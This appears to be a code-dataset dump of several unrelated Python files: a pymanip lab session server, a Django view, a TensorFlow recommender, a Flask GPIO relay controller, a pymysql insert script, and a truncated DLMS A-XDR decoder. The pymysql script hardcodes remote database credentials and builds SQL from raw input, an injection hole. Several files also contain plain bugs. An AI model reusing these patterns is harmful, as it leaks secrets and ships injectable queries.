smtp.send_message(msg)\n print(\"Email sent!\")\n except smtplib.SMTPHeloError:\n print(\"SMTP Helo Error\")\n except smtplib.SMTPRecipientsRefused:\n print(\"Some recipients have been rejected by SMTP server\")\n except smtplib.SMTPSenderRefused:\n print(\"SMTP server refused sender \" + self.email_from_addr)\n except smtplib.SMTPDataError:\n print(\"SMTP Data Error\")\n\n await self.sleep(delay_hours * 3600, verbose=False)\n\n async def plot(\n self,\n varnames=None,\n maxvalues=1000,\n yscale=None,\n *,\n x=None,\n y=None,\n fixed_ylim=None,\n fixed_xlim=None,\n ):\n \"\"\"\n if x, y is specified instead of varnames, plot var y against var x\n \"\"\"\n if varnames is None:\n if not isinstance(x, str) or not isinstance(y, str):\n raise TypeError(\"x and y should be strings\")\n varnames = (x, y)\n param_key_window = \"_window_xy_\" + \"_\".join(varnames)\n param_key_figsize = \"_figsize_xy_\" + \"_\".join(varnames)\n xymode = True\n else:\n if x is not None or y is not None:\n raise ValueError(\"Cannot specify both varnames and (x,y)\")\n if isinstance(varnames, str):\n varnames = (varnames,)\n param_key_window = \"_window_\" + \"_\".join(varnames)\n param_key_figsize = \"_figsize_\" + \"_\".join(varnames)\n xymode = False\n last_update = {k: 0 for k in varnames}\n saved_geom = self.parameter(param_key_window)\n if saved_geom:\n saved_geom = eval(saved_geom)\n saved_figsize = self.parameter(param_key_figsize)\n if saved_figsize:\n saved_figsize = eval(saved_figsize)\n plt.ion()\n fig = plt.figure(figsize=saved_figsize)\n mngr = fig.canvas.manager\n if saved_geom:\n mngr.window.setGeometry(saved_geom)\n ax = fig.add_subplot(111)\n line_objects = dict()\n self.figure_list.append(fig)\n ts0 = self.initial_timestamp\n while self.running:\n data = {\n k: self.logged_data_fromtimestamp(k, last_update[k]) for k in varnames\n }\n if xymode:\n ts_x, vs_x = data[x]\n ts_y, vs_y = data[y]\n if (ts_x != ts_y).any():\n raise ValueError(\n \"xymode can only be used if x and y are synchronous\"\n )\n if ts_x.size > 0:\n if y in line_objects:\n p = line_objects[y]\n xx = np.hstack((p.get_xdata(), vs_x))\n yy = np.hstack((p.get_ydata(), vs_y))\n p.set_xdata(xx)\n p.set_ydata(yy)\n if fixed_xlim is None:\n xlim = ax.get_xlim()\n if xlim[1] < np.max(xx) or xlim[0] > np.min(xx):\n ax.set_xlim((np.min(xx), np.max(xx)))\n if fixed_ylim is None:\n ylim = ax.get_ylim()\n if ylim[1] < np.max(yy) or ylim[0] > np.min(yy):\n ax.set_ylim((np.min(yy), np.max(yy)))\n else:\n p, = ax.plot(vs_x, vs_y, \"s-\")\n line_objects[y] = p\n ax.set_xlabel(x)\n ax.set_ylabel(y)\n if fixed_xlim is None:\n if np.min(vs_x) != np.max(vs_x):\n ax.set_xlim((np.min(vs_x), np.max(vs_x)))\n else:\n ax.set_xlim(fixed_xlim)\n if fixed_ylim is None:\n if np.min(vs_y) != np.max(vs_y):\n ax.set_ylim((np.min(vs_y), np.max(vs_y)))\n else:\n ax.set_ylim(fixed_ylim)\n fig.show()\n last_update[x] = ts_x[-1]\n last_update[y] = ts_y[-1]\n else:\n for name, values in data.items():\n ts, vs = values\n if ts.size > 0:\n if name in line_objects:\n # print('updating plot')\n p = line_objects[name]\n x = np.hstack((p.get_xdata(), (ts - ts0) / 3600))\n y = np.hstack((p.get_ydata(), vs))\n if x.size > maxvalues:\n x = x[-maxvalues:]\n y = y[-maxvalues:]\n p.set_xdata(x)\n p.set_ydata(y)\n if x[0] != x[-1]:\n ax.set_xlim((x[0], x[-1]))\n if fixed_ylim is None:\n ylim = ax.get_ylim()\n if ylim[1] < np.max(y) or ylim[0] > np.min(y):\n ylim = (\n min((ylim[0], np.min(y))),\n max((ylim[1], np.max(y))),\n )\n ax.set_ylim(ylim)\n else:\n # print('initial plot')\n x = (ts - ts0) / 3600\n y = vs\n if x.size > maxvalues:\n x = x[-maxvalues:]\n y = y[-maxvalues:]\n p, = ax.plot(x, y, \"o-\", label=name)\n line_objects[name] = p\n ax.set_xlabel(\"t [h]\")\n if x[0] != x[-1]:\n ax.set_xlim((x[0], x[-1]))\n if yscale:\n ax.set_yscale(yscale)\n if fixed_ylim is not None:\n ax.set_ylim(fixed_ylim)\n ax.legend()\n fig.show()\n last_update[name] = ts[-1]\n await asyncio.sleep(1)\n\n # Saving figure positions\n try:\n geom = mngr.window.geometry()\n figsize = tuple(fig.get_size_inches())\n self.save_parameter(\n **{param_key_window: str(geom), param_key_figsize: str(figsize)}\n )\n except AttributeError:\n pass\n\n async def figure_gui_update(self):\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=MatplotlibDeprecationWarning)\n while self.running:\n figure_list = self.figure_list\n if self.custom_figures:\n figure_list = figure_list + self.custom_figures\n if figure_list:\n for fig in self.figure_list:\n fig.canvas.start_event_loop(0.7 / len(self.figure_list))\n await asyncio.sleep(0.3 / len(self.figure_list))\n await asyncio.sleep(0.05)\n else:\n await asyncio.sleep(1.0)\n\n def ask_exit(self, *args, **kwargs):\n self.running = False\n print(\" Signal caught... stopping...\")\n\n async def sweep(self, task, iterable):\n # expects task of the format\n # async def balayage(sesn, voltage):\n # do something with voltage\n for val in iterable:\n await task(self, val)\n if not self.running:\n break\n self.running = False\n\n async def sleep(self, duration, verbose=True):\n start = time.monotonic()\n while self.running and time.monotonic() - start < duration:\n if verbose:\n print(\n \"Sleeping for \"\n + str(-int(time.monotonic() - start - duration))\n + \" s\"\n + \" \" * 8,\n end=\"\\r\",\n )\n sys.stdout.flush()\n await asyncio.sleep(0.5)\n if verbose:\n sys.stdout.write(\"\\n\")\n\n async def server_main_page(self, request):\n print(\"[\", datetime.now(), request.remote, request.rel_url, \"]\")\n if self.session_name:\n context = {\"title\": self.session_name}\n else:\n context = {\"title\": \"pymanip\"}\n response = aiohttp_jinja2.render_template(\"main.html\", request, context)\n return response\n\n async def server_logged_last_values(self, request):\n data = [\n {\n \"name\": name,\n \"value\": v[1],\n \"datestr\": time.strftime(dateformat, time.localtime(v[0])),\n }\n for name, v in self.logged_last_values().items()\n ]\n return web.json_response(data)\n\n async def server_get_parameters(self, request):\n params = {k: v for k, v in self.parameters().items() if not k.startswith(\"_\")}\n return web.json_response(params)\n\n async def server_plot_page(self, request):\n print(\"[\", datetime.now(), request.remote, request.rel_url, \"]\")\n context = {\"name\": request.match_info[\"name\"]}\n response = aiohttp_jinja2.render_template(\"plot.html\", request, context)\n return response\n\n async def server_data_from_ts(self, request):\n data_in = await request.json()\n last_ts = data_in[\"last_ts\"]\n name = data_in[\"name\"]\n timestamps, values = self.logged_data_fromtimestamp(name, last_ts)\n data_out = list(zip(timestamps, values))\n # print('from', last_ts, data_out)\n return web.json_response(data_out)\n\n async def server_current_ts(self, request):\n return web.json_response({\"now\": datetime.now().timestamp()})\n\n async def mytask(self, corofunc):\n print(\"Starting task\", corofunc)\n while self.running:\n await corofunc(self)\n print(\"Task finished\", corofunc)\n\n def run(self, *tasks, server_port=6913, custom_routes=None, custom_figures=None):\n loop = asyncio.get_event_loop()\n self.custom_figures = custom_figures\n\n # signal handling\n self.running = True\n if sys.platform == \"win32\":\n # loop.add_signal_handler raises NotImplementedError\n signal.signal(signal.SIGINT, self.ask_exit)\n else:\n for signame in (\"SIGINT\", \"SIGTERM\"):\n loop.add_signal_handler(getattr(signal, signame), self.ask_exit)\n\n # web server\n if server_port:\n app = web.Application(loop=loop)\n aiohttp_jinja2.setup(app, loader=self.jinja2_loader)\n app.router.add_routes(\n [\n web.get(\"/\", self.server_main_page),\n web.get(\"/api/logged_last_values\", self.server_logged_last_values),\n web.get(\"/plot/{name}\", self.server_plot_page),\n web.static(\"/static\", self.static_dir),\n web.post(\"/api/data_from_ts\", self.server_data_from_ts),\n web.get(\"/api/server_current_ts\", self.server_current_ts),\n web.get(\"/api/get_parameters\", self.server_get_parameters),\n ]\n )\n if custom_routes:\n app.router.add_routes(custom_routes)\n\n webserver = loop.create_server(\n app.make_handler(), host=None, port=server_port\n )\n\n # if any of the tasks submitted are coroutinefunctions instead of\n # coroutines, then assume they take only one argument (self)\n tasks_final = list()\n for t in tasks:\n if asyncio.iscoroutinefunction(t):\n tasks_final.append(self.mytask(t))\n elif asyncio.iscoroutine(t):\n tasks_final.append(t)\n else:\n raise TypeError(\"Coroutine or Coroutinefunction is expected\")\n print(\"Starting event loop\")\n if server_port:\n loop.run_until_complete(\n asyncio.gather(webserver, self.figure_gui_update(), *tasks_final)\n )\n else:\n loop.run_until_complete(\n asyncio.gather(self.figure_gui_update(), *tasks_final)\n )\n\n def save_remote_data(self, data):\n \"\"\"\n Save data from RemoteObserver object as datasets and parameters\n \"\"\"\n for k, v in data.items():\n # print(k,type(v),v)\n try:\n v[0]\n iterable = True\n except (TypeError, KeyError):\n iterable = False\n if iterable:\n # we are iterable\n self.add_dataset(**{k: v})\n else:\n # we are not iterable\n if isinstance(v, dict):\n # non reduced data, v is a dictionnary with two keys, 't' and 'value'\n self.add_dataset(**{k: v[\"value\"]})\n self.add_dataset(**{k + \"_time\": v[\"t\"]})\n else:\n try:\n # data must be a scalar\n float(v)\n except TypeError:\n print(\"skipping\", k, type(v))\n continue\n self.save_parameter(**{k: v})\n\n\nclass RemoteObserver:\n \"\"\"\n Remote observation of a running async session\n \"\"\"\n\n def __init__(self, host, port=6913):\n self.host = host\n self.port = port\n\n def _get_request(self, apiname):\n url = \"http://{host:}:{port:}/api/{api:}\".format(\n host=self.host, port=self.port, api=apiname\n )\n r = requests.get(url)\n try:\n return r.json()\n except json.decoder.JSONDecodeError:\n print(r.text)\n raise\n\n def _post_request(self, apiname, params):\n url = \"http://{host:}:{port:}/api/{api:}\".format(\n host=self.host, port=self.port, api=apiname\n )\n r = requests.post(url, json=params)\n try:\n return r.json()\n except json.decoder.JSONDecodeError:\n print(r.text)\n raise\n\n def get_last_values(self):\n \"\"\"\n Client function to grab the last set of values from\n a remote running async session\n \"\"\"\n\n data = self._get_request(\"logged_last_values\")\n return {d[\"name\"]: d[\"value\"] for d in data}\n\n def start_recording(self):\n self.server_ts_start = self._get_request(\"server_current_ts\")[\"now\"]\n data = self.get_last_values()\n self.remote_varnames = list(data.keys())\n\n def stop_recording(self, reduce_time=True, force_reduce_time=True):\n recordings = dict()\n for varname in self.remote_varnames:\n data = self._post_request(\n \"data_from_ts\",\n params={\"name\": varname, \"last_ts\": self.server_ts_start},\n )\n if len(data) > 0:\n recordings[varname] = {\n \"t\": [d[0] for d in data],\n \"value\": [d[1] for d in data],\n }\n if reduce_time:\n t = recordings[self.remote_varnames[0]][\"t\"]\n if (\n all([recordings[varname][\"t\"] == t for varname in recordings])\n or force_reduce_time\n ):\n recordings = {k: v[\"value\"] for k, v in recordings.items()}\n recordings[\"time\"] = t\n else:\n print(\"t =\", t)\n pprint(\n {\n varname: recordings[varname][\"t\"] == t\n for varname in self.remote_varnames\n }\n )\n parameters = self._get_request(\"get_parameters\")\n recordings.update(parameters)\n\n return recordings\n\n\nif __name__ == \"__main__\":\n with AsyncSession(\"Essai\") as sesn:\n sesn.add_entry(a=1, b=2)\n sesn.save_parameter(c=3)\n sesn.plot(\"a\")\n","sub_path":"pymanip/asyncsession.py","file_name":"asyncsession.py","file_ext":"py","file_size_in_byte":33682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"211413670","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom .models import Phone, PhoneCPages, PhoneCDetails\nfrom django.db.models import Avg\n\ndef phone_comments(request):\n ### 从models取数据传给template ###\n comments = PhoneCDetails.objects.all()\n # 评论数量\n counter = PhoneCDetails.objects.all().count()\n\n # 情感倾向\n sent_avg =f\" {PhoneCDetails.objects.aggregate(Avg('comment_sentiments'))['sentiment__avg']:0.2f} \"\n\n # 正向数量\n queryset = PhoneCDetails.objects.values('comment_sentiments')\n condtions = {'sentiment__gte': 0.5}\n plus = queryset.filter(**condtions).count()\n\n # 负向数量\n queryset = PhoneCDetails.objects.values('comment_sentiments')\n condtions = {'sentiment__lt': 0.5}\n minus = queryset.filter(**condtions).count()\n\n\n return render(request, 'result.html', locals())","sub_path":"week10/PCDjango/djcron/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"494485871","text":"from __future__ import print_function\nimport tensorflow as tf \nimport numpy as np \nimport cPickle\nfrom tensorflow.contrib import slim\n\n#Load features and labels\nfeatures = cPickle.load(open('nn_features.p', 'rb'))\nval_features = cPickle.load(open('nn_val_features.p', 'rb'))\nlabels = cPickle.load(open('labels.p', 'rb'))\n\n#to normalize submatrix which is not sparse\nl = [i for i in range(143, features.shape[1])]\nmu = np.mean(features, axis=0)\nstd = np.mean(features, axis=0)\nfeatures[:,l] = (features[:,l] - mu[l]) / std[l]\nval_features[:,l] = (val_features[:,l] - mu[l]) / std[l]\n\n\nmask = np.random.choice(features.shape[0], features.shape[0], replace=False)\nfeatures = features[mask]\nlabels = labels[mask]\n\npositive_mask = []\nnegative_mask = []\nfor i in range(labels.shape[0]):\n\tif np.array_equal(labels[i], [0,1]):\n\t\tpositive_mask.append(i)\n\telse:\n\t\tnegative_mask.append(i)\npos_features = features[positive_mask]\npos_labels = labels[positive_mask]\nneg_features = features[negative_mask]\nneg_labels = labels[negative_mask]\n\n#change these values later\nlearning_rate = 0.001\ntraining_epochs = 700\ndisplay_step = 1\nin_dim = features.shape[1]\nn_samples = features.shape[0]\nbatch_size = 128\nnum_features = features.shape[1]\nnum_classes = labels.shape[1]\nn_hidden1 = 256\nn_hidden2 = 256\nn_hidden3 = 256\nreg_strength = 5e-4\ndropout_rate = 0.5\n\n#define placeholder for our input\nX = tf.placeholder(\"float\", [None, num_features])\nY = tf.placeholder(\"float\", [None, num_classes])\n#drop_p = tf.placeholder(tf.float32)\n\ndef model(x):\n layer = slim.fully_connected(x,n_hidden1, weights_initializer=tf.truncated_normal_initializer(stddev=0.01),\n weights_regularizer=slim.l2_regularizer(reg_strength),scope='hidden1')\n layer = slim.batch_norm(layer, scope='bn1')\n layer = slim.dropout(layer, dropout_rate, scope='dropout1')\n layer = slim.fully_connected(layer,n_hidden2, weights_initializer=tf.truncated_normal_initializer(stddev=0.01),\n weights_regularizer=slim.l2_regularizer(reg_strength),scope='hidden2')\n layer = slim.batch_norm(layer, scope='bn2')\n layer = slim.dropout(layer, dropout_rate, scope='dropout2')\n layer = slim.fully_connected(layer,n_hidden3, weights_initializer=tf.truncated_normal_initializer(stddev=0.01),\n weights_regularizer=slim.l2_regularizer(reg_strength),scope='hidden3')\n out_layer = slim.fully_connected(layer,num_classes, activation_fn=None, weights_initializer=tf.truncated_normal_initializer(stddev=0.01),\n weights_regularizer=slim.l2_regularizer(reg_strength),scope='out_layer')\n return out_layer\n\nrecommendor = model(X)\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(recommendor, Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)\n\nprobabilities = tf.nn.softmax(recommendor)\n\n# Initializing the variables\ninit = tf.initialize_all_variables()\n\n# Launch the graph\nwith tf.Session() as sess:\n sess.run(init)\n # Training cycle\n for epoch in range(training_epochs):\n avg_loss = 0.\n total_batch = int(features.shape[0]/batch_size)\n # Loop over all batches\n start = 0\n end = batch_size\n for i in range(total_batch):\n #batch_x, batch_y = features[start:end], labels[start:end]\n pos_mask = np.random.choice(pos_features.shape[0], batch_size/2, replace=False)\n neg_mask = np.random.choice(neg_features.shape[0], batch_size/2, replace=False)\n batch_x = np.vstack((pos_features[pos_mask], neg_features[neg_mask]))\n batch_y = np.vstack((pos_labels[pos_mask], neg_labels[neg_mask]))\n shuffle = np.random.choice(batch_x.shape[0], batch_x.shape[0], replace=False)\n batch_x = batch_x[shuffle]\n batch_y = batch_y[shuffle]\n # Run optimization op (backprop) and loss op (to get loss value)\n _, c = sess.run([optimizer, loss], feed_dict={X: batch_x,\n Y: batch_y})\n # Compute average loss\n avg_loss += c / total_batch\n start = end\n end += batch_size\n # Display logs per epoch step\n if epoch % display_step == 0:\n print(\"Epoch:\", '%04d' % (epoch+1), \"loss=\", \\\n \"{:.9f}\".format(avg_loss))\n print(\"Optimization Finished!\")\n probs = sess.run(probabilities, feed_dict={X: val_features})\n\nprint('Probabilies: ', probs[:,1])\nf = open('validate_nolabel.txt', 'r')\nheader = f.readline()\ncontent = f.readlines()\nf.close()\nf = open('nn_val_res.txt', 'w')\nf.write(header + '\\n')\nfor i in range(len(content)):\n\tdata = content[i].replace('\\n', '').replace('\\r', '')\n\tdata += ',' + str(probs[i,1]) + '\\n'\n\tf.write(data)\nf.close()","sub_path":"code/neural_recommendation.py","file_name":"neural_recommendation.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"543312675","text":"import numpy as np\n\n\n\ndef create_pascal_label_colormap():\n \"\"\"Creates a label colormap used in PASCAL VOC segmentation benchmark.\n\n Returns:\n A Colormap for visualizing segmentation results.\n \"\"\"\n colormap = np.zeros((256, 3), dtype=int)\n ind = np.arange(256, dtype=int)\n\n for shift in reversed(range(8)):\n for channel in range(3):\n colormap[:, channel] |= ((ind >> channel) & 1) << shift\n ind >>= 3\n\n return colormap\n\n\ndef label_to_color_image(label):\n \"\"\"Adds color defined by the dataset colormap to the label.\n\n Args:\n label: A 2D array with integer type, storing the segmentation label.\n\n Returns:\n result: A 2D array with floating type. The element of the array\n is the color indexed by the corresponding element in the input label\n to the PASCAL color map.\n\n Raises:\n ValueError: If label is not of rank 2 or its value is larger than color\n map maximum entry.\n \"\"\"\n if label.ndim != 2:\n raise ValueError('Expected 2-D input label')\n\n colormap = create_pascal_label_colormap()\n\n if np.max(label) >= len(colormap):\n raise ValueError('label value too large.')\n\n return colormap[label]\n\n\ndef extract_segment_from_image(image, segment):\n\n \"\"\"Extracts a subimage according to the segmented area\n Args:\n image: A 2D array of RGB integer values that describe\n the original (resized) image.\n\n segment: A 2D array of integer values that describe the\n segmented areas of the image.\n\n Returns:\n return segment_out: A 3D array of RGB integer values that describe\n each of the extracted segments from the original image.\n\n Raises:\n ValueError: If image is not of rank 3 or if segment is not of rank 2\n RunTimeError: If the 2d dimensions of the segment and\n the original image are not the same\n \"\"\"\n if image.ndim != 3:\n raise ValueError('Expected 2-D RGB image')\n if segment.ndim != 2:\n raise ValueError('Expected 2-D segment')\n\n if image.shape[:2] != segment.shape:\n raise RunTimeError('Image and segment are not same size')\n\n unique_segments = np.unique(segment)\n print(unique_segments)\n segment_out_shape = (len(unique_segments), ) + image.shape\n segment_out = np.zeros(segment_out_shape, dtype=np.uint8)\n dim = image.shape[:2]\n percentages_filled = np.zeros(len(unique_segments), dtype=np.float)\n \n for h in range(len(unique_segments)):\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n if segment[i][j] == unique_segments[h]:\n segment_out[h][i][j] = image[i][j]\n percentages_filled[h] += 1 \n \n print(\"before: \", percentages_filled)\n print(\"dim: \", dim)\n percentages_filled /= (dim[0] * dim[1])\n print(\"after: \", percentages_filled)\n print(\"sum: \", np.sum(percentages_filled))\n return segment_out, percentages_filled\n","sub_path":"utils/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"532447507","text":"from flask import Flask, render_template\nimport datetime\nimport RPi.GPIO as GPIO\nimport tempSensor\n\napp = Flask(__name__)\nGPIO.cleanup()\npin_list = [17,27,22,23]\nGPIO.setmode(GPIO.BCM)\ntry:\n GPIO.setup(pin_list, GPIO.OUT, initial=GPIO.HIGH)\n #GPIO.setup(pin_list, GPIO.HIGH)\nexcept:\n print (\"error: gpio not set up right\")\n GPIO.cleanup()\n GPIO.setup(pin_list, GPIO.OUT, initial=GPIO.HIGH)\nfinally: \n print (\"reached finally\")\n\nsetPoint = 20\n\n@app.route(\"/\")\ndef index():\n #now = datetime.datetime.now()\n #timeString = now.strftime(\"%Y-%m-%d %H:%M\")\n templateData = returnData()\n return render_template('index.html', **templateData)\n\n@app.route(\"/relay/<pin>/\")\ndef relay(pin):\n currentPin = int(pin)\n print (\"relaypowered : \" + str(not GPIO.input(currentPin)))\n if GPIO.input(currentPin):\n GPIO.output(currentPin, GPIO.LOW)\n else:\n GPIO.output(currentPin, GPIO.HIGH)\n # return \"relaypowered : \" + str(not GPIO.input(currentPin))\n return index()\n \n@app.route('/temperature/<actionType>', methods=[\"GET\"])\ndef button(actionType):\n global setPoint\n if actionType == \"up\": \n setPoint += 1\n elif actionType == \"down\":\n setPoint -= 1\n return render_template(\"index.html\", returnData())\n\n@app.route(\"/exit/\")\ndef exit():\n GPIO.cleanup()\n sys.exit()\n\ndef returnData():\n global setPoint\n templateData = {\n #'title' : 'HELLO!',\n #'time': timeString,\n relay17: not GPIO.input(17),\n relay22: not GPIO.input(22),\n relay23: not GPIO.input(23),\n relay27: not GPIO.input(27),\n temperature: tempSensor.getTemp(\"C\"),\n setPoint: setPoint\n }\n return templateData\n \n\ntry:\n if __name__ == \"__main__\":\n print (\"tempSensor file location: \" + tempSensor.device_file )\n tempSensor.temp_sensor_init()\n print (\"tempSensor file location: \" + tempSensor.device_file)\n temperatures = tempSensor.read_temp()\n print (\"temperature: \" + str(temperatures[0]) + \"C\" + str(temperatures[1]) + \"F\")\n app.run(host='0.0.0.0', port=80, debug=False)\nexcept KeyboardInterrupt:\n print (\"keyboard inturrupt\")\nfinally:\n print (\"exiting with cleanup\")\n GPIO.cleanup()\n\n","sub_path":"flask-gpio.py","file_name":"flask-gpio.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"11092286","text":"import pymysql\n\n# Open database connection\ndb = pymysql.connect('remotemysql.com', 'g8MjlBGOHf','FMpJJWxnXd','g8MjlBGOHf')\n\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\n# Prepare SQL query to INSERT a record into the database.\n\n\ntry:\n nim=input(\"nim = \")\n nama=input (\"nama:\")\n\n sql = \"INSERT INTO mahasiswa (nim, nama) VALUES ('%s', '%s')\" %(nim, nama)\n # Execute the SQL command\n cursor.execute(sql)\n # Commit your changes in the database\n db.commit()\nexcept:\n # Rollback in case there is any error\n db.rollback()\n\n# disconnect from server\ndb.close()","sub_path":"insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"368694994","text":"import docx\nimport PyPDF2\nfrom pathlib import Path\nimport numpy as np\nfrom gensim.models.phrases import Phrases, ENGLISH_CONNECTOR_WORDS\nfrom gensim.models.doc2vec import Doc2Vec\nfrom nltk.tokenize import word_tokenize, sent_tokenize\n\n\ndef cosineSimilarity(A, B):\n return np.dot(A, B)/(np.linalg.norm(A)*np.linalg.norm(B))\n\n\ndef phraseTransform(sentences):\n words = list(map(word_tokenize, sentences))\n phrase_model = Phrases(words, min_count=5, threshold=0.5,\n connector_words=ENGLISH_CONNECTOR_WORDS)\n converted_words = [phrase_model[sent] for sent in words]\n converted_sentences = [\" \".join(w) for w in converted_words]\n return converted_sentences\n\n\ndef readDocx(document):\n document = docx.Document(document)\n paragraphs = [para.text.lower() for para in document.paragraphs]\n sentences = list()\n for p in paragraphs:\n sentences.extend(sent_tokenize(p))\n return sentences\n\n\ndef readPDF(document):\n pdfFileObj = open(document, 'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n pages = [pdfReader.getPage(page).extractText().lower()\n for page in range(pdfReader.numPages)]\n sentences = list()\n for p in pages:\n sentences.extend(sent_tokenize(p))\n return sentences\n\n\ndef readOther(document):\n with open(document) as f:\n content = f.read().lower().strip()\n sentences = sent_tokenize(content)\n return sentences\n\n\ndef getText(document):\n p = Path(document)\n extension = p.suffix\n if extension == \".docx\":\n return readDocx(document)\n elif extension == \".pdf\":\n return readPDF(document)\n else:\n return readOther(document)\n\n\ndef createDoc2VecModel(train_text, phrase=False):\n model = Doc2Vec(vector_size=300, window=2, epochs=20, min_count=1, seed=0)\n model.build_vocab(train_text)\n model.train(train_text, total_examples=model.corpus_count, epochs=50)\n return model","sub_path":"src/doc2sim.py","file_name":"doc2sim.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"417832721","text":"\"\"\"\nA XDR (IEC 61334-6is an Adapted External Data Represerntation Standard\n(XDR for DLMS)\n\nIt usage is for the reduction of APDU sizes and saving bandwidth by eliminating\ndata that is already known to both sender and receiver.\n\nFor example in comparison to BER encoding where the length of data is encoded\nusing A-XDR the lenght byte could be ommited if both sender and receiver are\naware of the lenght of an integer. (2 bytes for example.)\n\nIt is used to encode xDLMS APDUs.\n\nIt is not used for AARQ, AARE, RLRQ, and RLRE. (BER is used)\n\n.. note:\n The InititiateRequest the above requests and responses is an xDLMS APDU and\n uses A-XDR.\n\n\nOptional Values can be omitted by encoding 0x00 in its place. If a value is used\nit should be preceded with 0x01. (0x01+data)\n\nDefault values are encoded with 0x00 if using the default and 0x01+data if\nusing non default.\n\nEncoding integers: A-XDR makes it possible to encode with a fixed range and a\nvariable range.\n\nFixed range integers are encoded with the minimum number of bytes needed to fit\nthe value range.\n\nVariable range integers use the leftmost bit to control the encoding.\nleftmost bit = 0. Value < 128 , value can be encoded in one byte\nleftmost bit = 1. The whole leftmost byte is used to indicate the lenght of the\ninteger data. ex 0b10000010 -> 2 bytes after this is the integer. 0x820xff0xff = 65535\n\n\n\"\"\"\n\nimport attr\nimport typing\nfrom dlms_cosem.protocol.dlms_data import DlmsDataFactory, DlmsData\n\n\ndef decode_variable_integer(bytes_input: bytes):\n \"\"\"\n If the length is fitting in 7 bits it can be encoded in 1 bytes.\n If it is larger then 7 bybitstes the last bit of the first byte indicates\n that the length of the lenght is encoded in the first byte and the length\n is encoded in the following bytes.\n Ex. 0b00000010 -> Length = 2\n Ex 0b100000010, 0b000001111, 0b11111111 -> Lenght = 4095\n :param bytes_input: Input where the variable integer is at the beginning of\n the bytes\n :return: First variable integer the function finds. and the residual bytes\n \"\"\"\n\n # is the length encoded in single byte or mutliple?\n is_mutliple_bytes = bool(bytes_input[0] & 0b10000000)\n if is_mutliple_bytes:\n length_length = int(bytes_input[0] & 0b01111111)\n length = int(bytes_input[1:(length_length + 1)])\n return length, bytes_input[length_length + 1:]\n\n else:\n length = int(bytes_input[0] & 0b01111111)\n return length, bytes_input[1:]\n\n\n@attr.s\nclass DataSequenceEncoding:\n attribute_name: str = attr.ib()\n\n\nclass AXdrEncoding:\n attribute_name = attr.ib()\n\n\n@attr.s\nclass AttributeEncoding(AXdrEncoding):\n attribute_name: str = attr.ib()\n instance_class = attr.ib()\n return_value = attr.ib(default=False)\n wrap_end = attr.ib(default=False) # Maybe name wrapper?\n length: int = attr.ib(default=None)\n default: any = attr.ib(default=None)\n optional: bool = attr.ib(default=False)\n\n\n@attr.s\nclass SequenceEncoding(AXdrEncoding):\n attribute_name: str = attr.ib()\n instance_factory: DlmsDataFactory = attr.ib(default=DlmsDataFactory)\n\n\n@attr.s\nclass EncodingConf:\n attributes: typing.List[AXdrEncoding] = attr.ib()\n\n\nclass AXdrDecoder:\n\n def __init__(self, encoding_conf):\n\n self.encoding_conf: EncodingConf = encoding_conf\n\n def decode(self, bytes_data: bytes):\n \"\"\"\n return a dict to instantiate the class with\n \"\"\"\n # print(bytes_data)\n in_data = bytes_data[:] # copy so we don't work in the actual data.\n # print(in_data)\n\n out_dict = dict()\n\n for attribute in self.encoding_conf.attributes:\n\n key = attribute.attribute_name\n\n # print(b'To decode' + in_data)\n\n if isinstance(attribute, AttributeEncoding):\n\n data, rest = self._decode_attribute(in_data, attribute)\n\n if attribute.return_value:\n data = data.value\n\n elif isinstance(attribute, SequenceEncoding):\n\n data, rest = self._decode_sequence(in_data, attribute)\n else:\n raise NotImplemented(f'Attribute: {attribute} is not supported')\n\n in_data = rest\n out_dict.update({key: data})\n\n return out_dict\n\n def _decode_attribute(self, in_data, attribute):\n\n #print(b'parsing data: ' + in_data)\n #print(f'Attribute: {attribute}')\n\n first_byte = in_data[0]\n\n if first_byte == 0 and attribute.optional:\n data = None # Should this be a nulldata instead?\n return data, in_data[1:]\n\n elif first_byte == 0 and attribute.default is not None:\n data = attribute.default\n return data, in_data[1:]\n\n elif first_byte == 1 and (attribute.optional or attribute.default):\n # a value is existing and is after the 0x01\n in_data = in_data[1:] # remove the first byte\n\n # Check if length is known.\n if attribute.length:\n attribute_data = in_data[:attribute.length]\n data = attribute.instance_class.from_bytes(attribute_data)\n return data, in_data[attribute.length:]\n\n if attribute.wrap_end:\n attribute_data = in_data\n data = attribute.instance_class.from_bytes(attribute_data)\n return data, b''\n\n # first byte indicates length.\n attribute_data = in_data[1:(first_byte + 1)]\n data = attribute.instance_class.from_bytes(attribute_data)\n return data, in_data[(first_byte + 1):]\n\n def _decode_sequence(self, bytes_data: bytes, attribute):\n in_data = bytes_data[:] # copy so not to mess with initial data\n data_list = list()\n\n while in_data:\n first_obj, rest = self._get_first(in_data)\n\n data_list.append(first_obj)\n in_data = rest\n\n return data_list, in_data\n\n def _get_tag(self, bytes_data: bytes):\n return bytes_data[0]\n\n def _get_length(self, tag, bytes_data):\n \"\"\"\n If we know the length of the data it will not be encoded. But it the data is\n of a type where the length cannot be predetermined we need to decode the\n lenght. This is done by the same way the DLMS way to encode and decode\n variable integers\n\n \"\"\"\n data_cls = DlmsDataFactory.get_data_class(tag)\n if data_cls.LENGTH is None:\n length, rest = 